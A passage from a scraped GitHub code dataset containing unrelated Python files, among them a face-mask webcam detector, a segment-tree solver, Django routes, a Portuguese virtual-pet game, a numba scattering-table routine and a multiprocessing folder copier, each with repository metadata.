lemmas[lu.span]=lu.lemma\n            else:#if there already is an instance of this lemma\n                i=1\n                while lu.lemma+':'+str(i) in lemmas.values():\n                    i+=1\n                lemmas[lu.span]=lu.lemma+':'+str(i)\n        # here there is code to build a lemma's dictionary (span: lemma)\n        ## second step: extract textual lemmas from the rest of the structure; to do so, we take all spans, remove the one in the lemmas' keys, and\n        restofspans={span for span in self.allspans if span not in lemmas.keys()}\n        for span in restofspans:\n            if re.escape(self.text[span[0]:span[1]+1]) not in lemmas.values():\n                lemmas[span]=re.escape(self.text[span[0]:span[1]+1])\n            else:\n                i=1\n                while re.escape(self.text[span[0]:span[1]+1]+':'+str(i)) in lemmas.values():\n                    i+=1\n                lemmas[span]=re.escape(self.text[span[0]:span[1]+1]+':'+str(i))\n        ### step 2: transform our entries by their lemmatized counterparts.\n        for lu in self.annotations:\n            lu.set_lemma(lemmas[lu.span])\n            # keep the (span-or-itype, role) convention, swapping span tuples for lemma strings\n            lu.semantics={(lemmas[key] if type(key)==tuple else key, value) for (key, value) in lu.semantics}\n            lu.syntax={(lemmas[key], value) for (key, value) in lu.syntax}\nclass LU():\n    \"\"\"\n    This class is for an annotated LU\n    \"\"\"\n    \"\"\"\n    As attributes, we will have:\n    - the id of the sentence the unit is attached to\n    - its id.\n    - the lemma\n    - its span\n    - the associated frame\n    - a set ( semantics ): (span, semantic role) tuples\n    - a set ( syntax ): (span, syntactic role) tuples\n    \"\"\"\n\n    \"\"\"\n    as methods, we will have:\n    - set_lemma()\n    -\n    \"\"\"\n    def __init__(self, lemma=None, span=None, frame=None, lu_id=None, sent_id=None, syntax=None, semantics=None):\n        self.id=lu_id\n        self.sent_id=sent_id\n        self.lemma=lemma\n        self.frame = frame\n        self.span=span# the span argument was accepted but never stored, breaking elt.span lookups\n        self.syntax=set()\n        self.semantics=set()\n        if syntax is not None:\n            self.syntax=syntax\n        if semantics is not None:\n            self.semantics=semantics\n    def __repr__(self):\n        rep=str(self.lemma)+':'\n        for (span, role) in self.semantics:# semantics is a set of tuples, not a dict\n            rep+=\" \"+str(role)+'->'+str(span)\n        return rep\n    def get_lemma(self):\n        return self.lemma\n    def set_lemma(self, lemma):\n        self.lemma=lemma\n    def add_semantics(self, span, role):\n        self.semantics.add((span, role))\n    def remove_semantics(self, span=None, role=None):\n        # set-based removal: filter the (span, role) tuples instead of dict-style del\n        if span is not None:\n            self.semantics={(s, r) for (s, r) in self.semantics if s != span}\n        elif role is not None:\n            matching=[(s, r) for (s, r) in self.semantics if r == role]\n            if matching:\n                self.semantics.discard(matching[0])\n    def add_syntax(self, span, role):\n        self.syntax.add((span,role))\n    def remove_syntax(self, span=None, role=None):\n        # same set-based removal (the old 'del self.syntax[id]' referenced the wrong name and crashed)\n        if span is not None:\n            self.syntax={(s, r) for (s, r) in self.syntax if s != span}\n        elif role is not None:\n            matching=[(s, r) for (s, r) in self.syntax if r == role]\n            if matching:\n                self.syntax.discard(matching[0])\n
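# (editor sketch) quick check of the set-based API above, with made-up spans:\n#   lu = LU(lemma='run', span=(0, 2)); lu.add_semantics((4, 9), 'Agent')\n#   lu.remove_semantics(role='Agent')  # leaves lu.semantics empty\n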
\n\ntest=LU('Ramaquar')\ntest.add_semantics('123', 'popo')\n\ntest.set_lemma('rastaquouère')\n","repo_name":"HubertCorr/Memoire","sub_path":"Objets.py","file_name":"Objets.py","file_ext":"py","file_size_in_byte":10285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11662219964","text":"from lib.modelbuilder import Model\n\nimport numpy as np\nimport argparse\nimport torch\nimport cv2\n\nprint('[INFO] Initiating...')\nprint('[INFO] Loading resources...')\n\n# adds argument parser for the script\narg_parser = argparse.ArgumentParser()\narg_parser.add_argument('-d', '--detector', required=True, help='Path to face detector file') # path to your 'deploy.prototxt.txt' file\narg_parser.add_argument('-r', '--recognition_model', required=True, help='Path to face recognition file') # path to your 'caffemodel.weights' file\narg_parser.add_argument('-m', '--model', required=True, help='Path to the saved model') # path to your saved trained model\nargs = vars(arg_parser.parse_args())\n\nprint('[INFO] Model used for prediction:', args['model'])\nprint('[STATUS] Loading resources completed')\n\n# WARNING: you can change this accordingly. If you want to make changes, make sure you also set the same value in 'extract_dataset.py' and 'train_and_evaluate.py' files\nIMG_SIZE = 64 # resize value\nLABELS = ['without_mask', 'with_mask', 'mask_weared_incorrect'] # dataset labels\nframe_name = 'Webcam Capture'\n\n# save argument parser into variables\nmodel_path = args['model']\nprototxt_file = args['detector']\ncaffemodel_file = args['recognition_model']\n\n# check for CUDA and GPU computation availability\nuse_cuda = torch.cuda.is_available() # note the call: the bare function object was always truthy\n# initiate model object\nmodel = Model()\nif use_cuda:\n    model = model.cuda() # move model to GPU\n# load the saved model from the training phase\nmodel.load_state_dict(torch.load(model_path))\n\n# prepare video capture with webcam/camera\ncap = cv2.VideoCapture(0)\n# load in the face detection model\nface_model = cv2.dnn.readNetFromCaffe(prototxt_file, caffemodel_file)\n\nprint('[INFO] Looking for camera/webcam...')\n\n# check for webcam/camera availability\nif cap is None or not cap.isOpened():\n    print('[ERROR] No camera device is detected!')\nelse:\n    print('[INFO] Camera found! Opening...')\n
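    # (editor note) the 300x300 input size and (104.0, 177.0, 123.0) channel means\n    # below are the standard constants for this SSD Caffe face detector; treat them\n    # as model-specific values rather than tunables.\n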
    while True:\n        # read webcam/camera frames\n        ret, frame = cap.read()\n        (h,w) = frame.shape[:2]\n        # detect any faces found\n        face_blob = cv2.dnn.blobFromImage(frame, scalefactor=1.0, size=(300,300), mean=(104.0, 177.0, 123.0), swapRB=False, crop=False)\n        face_model.setInput(face_blob)\n        detector = face_model.forward()\n\n        if len(detector) > 0:\n            for i in range(0, detector.shape[2]):\n                rect = detector[0,0,i,3:7] * np.array([w,h,w,h]) # for any faces found, prepare a rectangle bounding box\n                (start_x, start_y, end_x, end_y) = rect.astype('int') # bounding box position (x and y)\n                confidence = detector[0,0,i,2] # prediction confidence\n\n                # proceed to the next step if confidence is above the threshold\n                if confidence > 0.5:\n                    face = frame[start_y:end_y, start_x:end_x]\n                    if face.size == 0:\n                        continue\n                    \n                    resized_face = cv2.resize(face, (IMG_SIZE, IMG_SIZE)) # resize face\n                    resized_face = np.expand_dims(resized_face, axis=0) # expand dimension from 3D (IMG_SIZE, IMG_SIZE, 3) to 4D (1, IMG_SIZE, IMG_SIZE, 3)\n                    resized_face = np.transpose(resized_face, (0, 3, 1, 2)) # reorder to (m, c, IMG_SIZE, IMG_SIZE); a plain reshape would scramble the pixel layout\n\n                    test_feature = torch.Tensor(resized_face) # convert numpy.array to torch.Tensor\n                    model.eval() # set model to evaluation mode\n                    if use_cuda:\n                        test_feature = test_feature.cuda() # move to GPU if available\n                    \n                    # predict using the trained model\n                    output = model(test_feature)\n                    pred = np.argmax(output.cpu().detach())\n                    # calculate prediction score using Softmax formula\n                    e_x = np.exp(output[0].cpu().detach().numpy()) # e^x\n                    score = np.max(e_x / e_x.sum() * 100) # max(e^x / sum(e^x))\n\n                    # set prediction text\n                    text = '{}: {:.2f}%'.format(LABELS[pred], score)\n                    if pred == 0: # without mask\n                        cv2.putText(frame, text, (start_x, start_y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,0,255), 2)\n                        cv2.rectangle(frame, (start_x, start_y), (end_x, end_y), (255,0,255), 2)\n                    elif pred == 1: # with mask\n                        cv2.putText(frame, text, (start_x, start_y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0,128,0), 2)\n                        cv2.rectangle(frame, (start_x, start_y), (end_x, end_y), (0,128,0), 2)\n                    else: # mask weared incorrect\n                        cv2.putText(frame, text, (start_x, start_y), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255,255,0), 2)\n                        cv2.rectangle(frame, (start_x, start_y), (end_x, end_y), (255,255,0), 2)\n\n        cv2.imshow(frame_name, frame)\n\n        # terminate program on 'q' keyboard press\n        if cv2.waitKey(1) & 0xFF == ord('q'):\n            break\n    \n    print('[INFO] Closing program...')\n    cap.release()\n    cv2.destroyAllWindows()\n","repo_name":"archeltaneka/face-mask-detection","sub_path":"open_and_predict_from_webcam.py","file_name":"open_and_predict_from_webcam.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27737557742","text":"import sys\ninput = sys.stdin.readline  # fast input; the original 'ipnut' binding was a typo and never used\n\n\ndef init(start, end, cur):\n    if start == end:\n        tree[cur] = arr[start]\n        return tree[cur]\n    mid = (start + end) // 2\n    tree[cur] = min(init(start, mid, cur * 2), init(mid + 1, end, cur * 2 + 1))\n    return tree[cur]\n\n\ndef find(start, end, cur, left, right):\n    if left > end or right < start:\n        return 1000000001\n\n    if left <= start and end <= right:\n        return tree[cur]\n\n    mid = (start + end) // 2\n    return min(find(start, mid, cur * 2, left, right), find(mid + 1, end, cur * 2 + 1, left, right))\n\n\nN, M = map(int, input().split())\n\narr = [int(input()) for _ in range(N)]\ntree = [0] * 4 * N\ninit(0, N - 1, 1)\n\nfor i in range(M):\n    a, b = map(int, 
input().split())\n print(find(0, N - 1, 1, a - 1, b - 1))\n","repo_name":"thisisiron/Algorithm","sub_path":"BOJ/PrefixSum/10868.py","file_name":"10868.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11805454246","text":"from django.conf.urls import url\nfrom . import views\n\nurlpatterns = [\n url('^$', views.index),\n url('^travelbuddy$', views.index),\n url('^main$', views.index),\n url('^travels$', views.travels),\n url('^travels/add$', views.addplan),\n url(r'^login$', views.login),\n url(r'^logout$', views.logout),\n url('^travels/destination/(?P\\d+)$', views.destination),\n url('^travels/join/(?P\\d+)$', views.join_trip),\n]","repo_name":"idarrenly/travel","sub_path":"apps/travelbuddy/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"31788369421","text":"\"\"\"\nEliezer Silva\nExercício 15\n-------------\nClasse Bichinho Virtual++:\nMelhore o programa do bichinho virtual, permitindo que o usuário especifique quanto de comida ele fornece ao bichinho e\npor quanto tempo ele brinca com o bichinho.\nFaça com que estes valores afetem quão rapidamente os níveis de fome e tédio caem.\n\"\"\"\nimport time\n\n\nclass Bichinho:\n def __init__(self, nome, nascimento):\n self.nascimento = nascimento\n self.nome = nome\n self.valor_idade = 0\n self.idade = 'Bebê'\n self.valor_saude = 5\n self.saude = 'Saudável'\n self.valor_fome = 2\n self.fome = 'Faminto'\n self.valor_humor = 5\n self.humor = 'Feliz'\n\n def alterar_idade(self):\n agora = time.time()\n self.valor_idade = float(f'{(self.nascimento - agora) * (-1):.2f}')\n\n def alterar_saude(self):\n self.valor_saude -= self.valor_idade * 0.01\n self.valor_humor -= self.valor_idade * 0.01\n self.valor_fome -= 0.3\n\n if self.valor_fome < 5:\n self.valor_saude -= 0.02\n else:\n self.valor_saude += 0.5\n\n if self.valor_humor < 5:\n self.valor_saude -= 0.02\n else:\n self.valor_saude += 0.5\n\n def alterar_fome(self, comida):\n self.valor_fome += comida\n menu(self)\n\n def alterar_humor(self, valor):\n self.valor_humor += valor\n\n if self.valor_fome < 5:\n self.valor_humor -= 0.5\n elif self.valor_fome > 5:\n self.valor_humor += 0.5\n\n self.alterar_fome(0)\n\n def retornar_idade(self):\n if self.valor_idade <= 15:\n self.idade = 'Bebê'\n elif self.valor_idade <= 30:\n self.idade = 'Criança'\n elif self.valor_idade <= 45:\n self.idade = 'Adolescente'\n elif self.valor_idade <= 60:\n self.idade = 'Adulto'\n elif self.valor_idade <= 75:\n self.idade = 'Idoso'\n elif self.valor_idade <= 120:\n print(f'{self.nome} está velhinho...\\n')\n else:\n time.sleep(1.2)\n print(f'Chegou a hora de {self.nome} descansar...\\n'\n f'Adeus meu amiguinho!!'\n f':´(')\n quit()\n return print(f'{self.nome} é um {self.idade}')\n\n def retornar_saude(self):\n if self.valor_saude < -10:\n print(f'{self.nome} ficou muito doente e morreu...')\n quit()\n elif self.valor_saude <= 2:\n self.saude = 'Muito Doente'\n elif 2 < self.valor_saude < 5:\n self.saude = 'Doente'\n elif 5 <= self.valor_saude < 8:\n self.saude = 'Saudável'\n else:\n self.saude = 'Muito Saudável'\n return print(f'Saúde: {self.nome} está {self.saude}')\n\n def retornar_fome(self):\n if self.valor_fome < -10:\n print(f'{self.nome} morreu de fome...\\n'\n f'RIP...')\n quit()\n elif 0 <= self.valor_fome <= 2:\n self.fome = 'Muito Faminto'\n elif 2 < self.valor_fome < 5:\n 
self.fome = 'Faminto'\n elif 5 <= self.valor_fome < 7:\n self.fome = 'Satisfeito'\n elif 7 <= self.valor_fome < 8:\n self.fome = 'Cheio'\n elif 8 <= self.valor_fome <= 10:\n self.fome = 'Muito Cheio'\n elif self.valor_fome > 13:\n print(f'{self.nome} explodiu de tanto comer...\\n'\n f'RIP...')\n quit()\n return print(f'Fome: {self.nome} está {self.fome}')\n\n def retornar_humor(self):\n if self.valor_humor < 2:\n self.humor = 'Muito Triste'\n elif 2 <= self.valor_humor < 5:\n self.humor = 'Triste'\n elif 5 <= self.valor_humor < 7:\n self.humor = 'Feliz'\n elif 7 <= self.valor_humor < 8:\n self.humor = 'Muito Feliz'\n elif self.valor_humor >= 8:\n self.humor = 'Hiper Feliz'\n return print(f'Humor: {self.nome} está {self.humor}')\n\n\ndef menu(bichinho):\n bichinho.retornar_idade()\n bichinho.retornar_saude()\n bichinho.retornar_fome()\n bichinho.retornar_humor()\n\n print()\n\n bichinho.alterar_idade()\n bichinho.alterar_saude()\n\n print('-' * 6 + ' MENU ' + 6 * '-')\n opcao = input('Alimentar [1]\\n'\n 'Brincar [2]\\n'\n 'Não fazer nada [3]\\n'\n 'Sair [0]\\n'\n '>>> Opção: ')\n\n if opcao == '1':\n print(f'{bichinho.nome} está comendo...\\n')\n time.sleep(1)\n bichinho.alterar_fome(1)\n elif opcao == '2':\n print(f'{bichinho.nome} está brincando...\\n')\n time.sleep(1)\n bichinho.alterar_humor(1)\n elif opcao == '3':\n print(f'{bichinho.nome} não está fazendo nada...\\n')\n time.sleep(1)\n bichinho.alterar_humor(-0.2)\n elif opcao == '0':\n print(f'{bichinho.nome} está dizendo adeus...\\n')\n time.sleep(1)\n print('Obrigado por cuidar de mim!!\\n'\n 'Adeus :)')\n quit()\n else:\n menu(bichinho)\n\n\ndef criar_bichinho():\n print('\\nCrie seu Bichinho Virtual')\n nome = input('>>> Dê um nome para o seu bichinho: ')\n nascimento = time.time()\n bichinho = Bichinho(nome, nascimento)\n print('Seu Bichinho nasceu...\\n')\n time.sleep(1.2)\n menu(bichinho)\n\n\ncriar_bichinho()\n","repo_name":"eliezersilva-dev/PythonBrasil-ListaDeExercicios","sub_path":"8 - Exercícios com Classes 16-17/exercicio_15/exercicio15.py","file_name":"exercicio15.py","file_ext":"py","file_size_in_byte":5394,"program_lang":"python","lang":"pt","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"19005508247","text":"import numpy as np\r\nfrom math import atan2\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.animation import FuncAnimation\r\n\r\nSteps = 1000 #количество кадров\r\n\r\n#размеры пластины\r\nPlateWidth = 3\r\nPlateHeight = 4\r\nPlateDiagonal = ((PlateWidth**2 + PlateHeight**2) ** 0.5) / 2 #делим на два, так как проекция косинуса должна равномерно растянуться в обе стороны\r\n\r\nt = np.linspace(0, 100, Steps)\r\nz = np.linspace(0, 0, Steps)\r\nd = PlateDiagonal * np.cos(t)\r\nphi = 0.5 * t #скорость поворота\r\n\r\n#угол диагонали пластины, по которой катается шарик\r\nalpha = atan2(PlateHeight, PlateWidth)\r\n\r\n#отступ от пола\r\nStandZ = 1\r\n\r\n#нижние углы пластины в полярных координатах, R=PlateWidth/2\r\nAX = PlateWidth / 2 * np.cos(phi)\r\nAY = PlateWidth / 2 * np.sin(phi)\r\nAZ = StandZ\r\n\r\n#углы пластины симметричны относительно (0,0)\r\nBX = -PlateWidth / 2 * np.cos(phi)\r\nBY = -PlateWidth / 2 * np.sin(phi)\r\nBZ = StandZ\r\n\r\n#верхние углы пластины\r\nCX = BX\r\nCY = BY\r\nCZ = BZ + PlateHeight\r\n\r\nDX = AX\r\nDY = AY\r\nDZ = AZ + PlateHeight\r\n\r\nPathWidth = d * np.cos(alpha)\r\n\r\n#выражаем абсолютные координаты через промежуточную СО в центре диагонали\r\npointZ = StandZ + PlateHeight / 2 + d*np.sin(alpha)\r\n#полярные координаты\r\npointX = PathWidth 
* np.cos(phi)\r\npointY = PathWidth * np.sin(phi)\r\n\r\nfig = plt.figure()\r\nax = fig.add_subplot(projection='3d')\r\nax.set(xlim=[-8, 8], ylim=[-8, 8], zlim=[0, 8])\r\n\r\npointPlot, = ax.plot(pointX[0], pointY[0], pointZ[0], marker='o', markersize='3') #marker='o' наша точка - это шарик\r\nlineABPLOT, = ax.plot([AX[0], BX[0]], [AY[0], BY[0]], [AZ, BZ], color='black', linewidth='4')\r\nlineCDPLOT, = ax.plot([CX[0], DX[0]], [CY[0], DY[0]], [CZ, DZ], color='black', linewidth='4')\r\nlineADPLOT, = ax.plot([AX[0], DX[0]], [AY[0], DY[0]], [AZ, DZ], color='black', linewidth='4')\r\nlineBCPLOT, = ax.plot([BX[0], CX[0]], [BY[0], CY[0]], [BZ, CZ], color='black', linewidth='4')\r\nlineBDPLOT, = ax.plot([BX[0], DX[0]], [BY[0], DY[0]], [BZ, DZ], color='black', linewidth='4', alpha=0.3)\r\n\r\n#ось вращения\r\naxis = ax.plot([0, 0], [0, 0], [0, 1], color='black', linewidth='2')\r\naxis1 = ax.plot([0, 0], [0, 0], [5, 6], color='black', linewidth='2')\r\naxis2 = ax.plot([-1, 1], [0, 0], [0, 0], color='black', linewidth='2')\r\n\r\ndef Anima(i):\r\n pointPlot.set_data_3d(pointX[i], pointY[i], pointZ[i])\r\n lineABPLOT.set_data_3d([AX[i], BX[i]], [AY[i], BY[i]], [AZ, BZ])\r\n lineCDPLOT.set_data_3d([CX[i], DX[i]], [CY[i], DY[i]], [CZ, DZ])\r\n lineADPLOT.set_data_3d([AX[i], DX[i]], [AY[i], DY[i]], [AZ, DZ])\r\n lineBCPLOT.set_data_3d([BX[i], CX[i]], [BY[i], CY[i]], [BZ, CZ])\r\n lineBDPLOT.set_data_3d([BX[i], DX[i]], [BY[i], DY[i]], [BZ, DZ])\r\n return [pointPlot, lineABPLOT, lineCDPLOT, lineBCPLOT, lineADPLOT, lineBDPLOT]\r\n\r\nanima = FuncAnimation(fig, Anima, frames=Steps, interval=1000/60)\r\nplt.show()\r\n","repo_name":"sonikxx/MAI_Theoretical_Mechanics","sub_path":"lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":3203,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"28143642831","text":"import gym\nimport gym.envs.atari\nimport random\nimport sys\nfrom utils import *\n\n# keeping these global here so we can sample easier \nenv = gym.envs.atari.atari_env.AtariEnv(obs_type='image', frameskip=2)\nstart_state = env.clone_full_state()\nplanner_traces = pickle.load(open(\"datas/planner_traces.p\",\"rb\"))\n\nclass RecordAgent:\n def __init__(self, recorded_actions):\n self.actions = recorded_actions\n self.counter = 0\n\n # takes some observation but doesn't really use them\n def act(self, s, show_prob):\n # obs_prev, obs, prev_a = s\n assert self.counter < len(self.actions), \"ran out of actions!!\"\n ret = self.actions[self.counter]\n self.counter += 1\n return ret\n \ndef sample_planner_sa(n_pairs = 40):\n state, r_best, best_as = random.choice(planner_traces)\n rec_agent = RecordAgent(best_as)\n trace = generate_pong_trace(env, state, rec_agent, do_render=False)\n trs = [random.choice(trace) for i in range(n_pairs)]\n ret = []\n for pz in trs:\n sss, a = pz[0], pz[1]\n if sss[0] is None or sss[1] is None:\n continue\n ret.append((sss,a))\n return ret\n\nif __name__ == \"__main__\":\n while True:\n state, r_best, best_as = random.choice(planner_traces)\n rec_agent = RecordAgent(best_as)\n trr = generate_pong_trace(env, state, rec_agent)\n","repo_name":"evanthebouncy/nnprog","sub_path":"v18_pong_attention1/supervise.py","file_name":"supervise.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"5798315863","text":"# Create the self-regulation method\nself_regulation_method = Method(level=\"Strategy\", 
name=\"Self-Regulation\")\n\n# Create sub-methods for Self-Regulation\nentrepreneurial_learning = Method(level=\"Tactic\", name=\"Entrepreneurial Learning\")\nchallenge = Method(level=\"Tactic\", name=\"Challenge\")\neduscrum = Method(level=\"Tactic\", name=\"EduScrum\")\n\n# Add the sub-methods to the self-regulation method\nself_regulation_method.add_sub_method(entrepreneurial_learning)\nself_regulation_method.add_sub_method(challenge)\nself_regulation_method.add_sub_method(eduscrum)\n\n# Define sub-methods for Entrepreneurial Learning\nsub_methods_el = [\n Method(level=\"Operational\", name=name) for name in\n [\"Collaboration\", \"Differentiation\", \"Creative Exploration\", \"Active Learning\", \"Open Communication\", \"Observation and Analysis\"]\n]\nfor sub_method in sub_methods_el:\n entrepreneurial_learning.add_sub_method(sub_method)\n\n# Define sub-methods for Challenge\nsub_methods_c = [\n Method(level=\"Operational\", name=name) for name in\n [\"Self-Devised Challenges\", \"Task-Driven Challenges\", \"Adaptive Approach\", \"Challenging Elements\", \"Feedback and Coaching\", \"Intrinsic Motivation\", \"Collaboration\"]\n]\nfor sub_method in sub_methods_c:\n challenge.add_sub_method(sub_method)\n\n# Define sub-methods for EduScrum\nsub_methods_es = [\n Method(level=\"Operational\", name=name) for name in\n [\"Hackathon\", \"Scrum\", \"Own Work\", \"Sprints\"]\n]\nfor sub_method in sub_methods_es:\n eduscrum.add_sub_method(sub_method)\n\n\n\n\n","repo_name":"HeDude/Freell","sub_path":"language/lib/method/Selfregulation.py","file_name":"Selfregulation.py","file_ext":"py","file_size_in_byte":1497,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"29442068179","text":"import pytest\nfrom ingestion.wikipedia.scrapers import AirportCodeScraper\n\n\nclass TestAirportCodeScraper:\n @pytest.mark.parametrize(\n \"letter, expected\",\n [\n (\"A\", \"A\"),\n (\"Z\", \"Z\"),\n (\"a\", \"A\"),\n (\"z\", \"Z\"),\n ],\n )\n def test_constructor_ok(self, letter, expected):\n actual = AirportCodeScraper(letter=letter).letter\n assert actual == expected\n\n @pytest.mark.parametrize(\n \"letter\",\n [(\"Aa\"), (\"Test\")],\n )\n def test_constructor_exception_char_count(self, letter):\n with pytest.raises(\n ValueError,\n match=\"parameter 'letter' attribute should be just one character\",\n ):\n scraper = AirportCodeScraper(letter=letter)\n\n @pytest.mark.parametrize(\n \"letter\",\n [\n (\"-\"),\n (\"0\"),\n (\"!\"),\n (\"9\"),\n ],\n )\n def test_constructor_exception_alpha_char(self, letter):\n with pytest.raises(\n ValueError, match=\"parameter 'letter' should be an alphanumeric character\"\n ):\n scraper = AirportCodeScraper(letter=letter)\n\n @pytest.mark.parametrize(\n \"letter, expected\",\n [\n (\n \"A\",\n \"https://en.wikipedia.org/wiki/List_of_airports_by_IATA_airport_code:_A\",\n ),\n (\n \"Z\",\n \"https://en.wikipedia.org/wiki/List_of_airports_by_IATA_airport_code:_Z\",\n ),\n (\n \"a\",\n \"https://en.wikipedia.org/wiki/List_of_airports_by_IATA_airport_code:_A\",\n ),\n (\n \"z\",\n \"https://en.wikipedia.org/wiki/List_of_airports_by_IATA_airport_code:_Z\",\n ),\n ],\n )\n def test_get_endpoint(self, letter, expected):\n actual = AirportCodeScraper(letter=letter)._get_endpoint()\n assert actual == 
expected\n","repo_name":"gpeixinho/flights-project","sub_path":"tests/ingestion/wikipedia/test_scrapers.py","file_name":"test_scrapers.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"840710431","text":"import math\n\nimport numba as nb\nimport numpy as np\n\nimport numba_mcerd.mcerd.constants as c\nimport numba_mcerd.mcerd.objects as o\nimport numba_mcerd.mcerd.objects_jit as oj\n# import numba_mcerd.mcerd.symbols as s\nfrom numba_mcerd.mcerd import scattering_angle_jit\n\n\ndef scattering_table(g: o.Global, ion: o.Ion, target: o.Target, scat: o.Scattering,\n pot: oj.Potential, natom: int) -> None:\n \"\"\"Create a lookup table for scattering (energies?)\"\"\"\n targetZ = target.ele[natom].Z\n targetA = target.ele[natom].A\n\n scat.a = 0.8854 * c.C_BOHR_RADIUS / (ion.Z ** 0.23 + targetZ ** 0.23)\n scat.E2eps = 4.0 * c.C_PI * c.C_EPSILON0 * scat.a * targetA /\\\n ((ion.A + targetA) * ion.Z * targetZ * c.C_E**2)\n\n emin = math.log(g.emin * scat.E2eps)\n emax = math.log(g.ionemax * scat.E2eps)\n\n ymin = math.log(1.0 / (2.0 * math.exp(emax) * math.tan(0.5 * c.C_PI * c.MAXANGLE / 180.0)))\n ymax = math.log(1.0 / (2.0 * scat.a * target.minN**(1.0/3.0)))\n\n estep = (emax - emin) / (c.EPSNUM - 2)\n ystep = (ymax - ymin) / (c.YNUM - 2)\n\n scat.logemin = emin\n scat.logymin = ymin\n\n scat.logediv = 1.0 / estep\n scat.logydiv = 1.0 / ystep\n\n with g.master.fpout.open(\"a\") as f:\n f.write(f\"a, E2eps {scat.a} {scat.E2eps}\\n\")\n f.write(f\"emin, emax: {emin} {emax}\\n\")\n f.write(f\"ymin, ymax: {ymin} {ymax}\\n\")\n f.write(f\"estep, ystep: {estep} {ystep}\\n\")\n\n scat_matrix = np.array(scat.angle, dtype=np.float64) # Numba seems to do float64 instead of float32\n opt_e, opt_y = main_math(scat_matrix, pot, emin, estep, ymin, ystep)\n scat.angle = scat_matrix\n ion.opt.e = opt_e\n ion.opt.y = opt_y\n\n\n# Can't be parallelized automatically. A manual option would be to split\n# scat_matrix into pieces, and then calculate exp_e and exp_y like so:\n# exp_e = math.exp(emin + (i-1) * estep)\n# exp_y = math.exp(ymin + (j-1) * ystep)\n# scat_matrix[i][0] and scat_matrix[0][j] need to be done separately\n@nb.njit(cache=True, nogil=True)\ndef main_math(scat_matrix, pot, emin, estep, ymin, ystep):\n exp_e = exp_y = 0.0\n\n for i in range(1, scat_matrix.shape[0]):\n exp_e = math.exp(emin)\n scat_matrix[i][0] = exp_e\n y = ymin\n for j in range(1, scat_matrix.shape[1]):\n # print(i, j) # Good for debugging performance\n exp_y = math.exp(y)\n scat_matrix[i][j] = scattering_angle_jit.scattering_angle(pot, exp_e, exp_y)\n y += ystep\n emin += estep\n\n y = ymin\n for j in range(1, scat_matrix.shape[1]):\n scat_matrix[0][j] = math.exp(y)\n y += ystep\n\n return exp_e, exp_y\n\n\n@nb.njit(parallel=True)\ndef main_math_parallelized(scat_matrix, pot, emin, estep, ymin, ystep):\n \"\"\"Can be parallelized, but doesn't offer any speedup. 
Incomplete, don't use.\"\"\"\n    exp_e = exp_y = 0.0\n\n    for i in nb.prange(1, scat_matrix.shape[0]):\n        # exp_e = math.exp(emin + (i - 1) * estep) # Warning for this\n        # scat_matrix[i][0] = exp_e\n        for j in nb.prange(1, scat_matrix.shape[1]):\n            # exp_y = math.exp(ymin + (j - 1) * ystep) # Warning for this\n            scat_matrix[i][j] = scattering_angle_jit.scattering_angle(\n                pot,\n                math.exp(emin + (i - 1) * estep),\n                math.exp(ymin + (j - 1) * ystep))\n\n    # for j in numba.prange(1, scat_matrix.shape[1]):\n    #     y = ymin + (j - 1) * ystep\n    #     scat_matrix[0][j] = math.exp(y)\n\n    return exp_e, exp_y\n","repo_name":"tpitkanen/numba_mcerd","sub_path":"numba_mcerd/mcerd/init_simu_jit.py","file_name":"init_simu_jit.py","file_ext":"py","file_size_in_byte":3493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8925967955","text":"import os\nimport multiprocessing\n# Copy a folder\ndef copy(q,file_name,old_folder_name,new_folder_name):\n    # Open the file in the source folder and read its contents\n    old_f = open(old_folder_name + \"/\" + file_name,\"rb\")\n    content = old_f.read()\n    old_f.close()\n    # Open the file in the new folder and write the contents\n    new_f = open(new_folder_name + \"/\" + file_name,\"wb\")\n    new_f.write(content)\n    new_f.close()\n    # Add the file name to the queue\n    q.put(file_name)\ndef main():\n    # Get the folder to copy\n    old_folder_name = input(\"请输入要复制的文件夹:\")\n    # Create the new folder\n    new_folder_name = old_folder_name + \"附件\"\n    os.mkdir(new_folder_name)\n    # Get the names of the files in the source folder\n    file_names = os.listdir(old_folder_name)\n    print(file_names)\n    # Create a process pool\n    po = multiprocessing.Pool(5)\n    # Create a queue\n    q = multiprocessing.Manager().Queue()\n    # Add tasks to the process pool\n    for file_name in file_names:\n        po.apply_async(copy,args=(q,file_name,old_folder_name,new_folder_name))\n    po.close()\n    # Count the number of files in the folder\n    all_num = len(file_names)\n    # Number of files copied so far\n    copy_num = 0\n    while True:\n        # Get a file name from the queue\n        a = q.get()\n        print(a)\n        copy_num += 1\n        print(\"\\r复制的进度为%.2f %%\"%(copy_num*100/all_num),end=\"\")\n        if copy_num >= all_num:\n            break\n    print()\nif __name__ == '__main__':\n    main()","repo_name":"JacksonMike/python_exercise","sub_path":"python练习/网络编程练习/进程/18-copy文件夹显示进度.py","file_name":"18-copy文件夹显示进度.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12804194912","text":"import tensorflow as tf\n\ndef 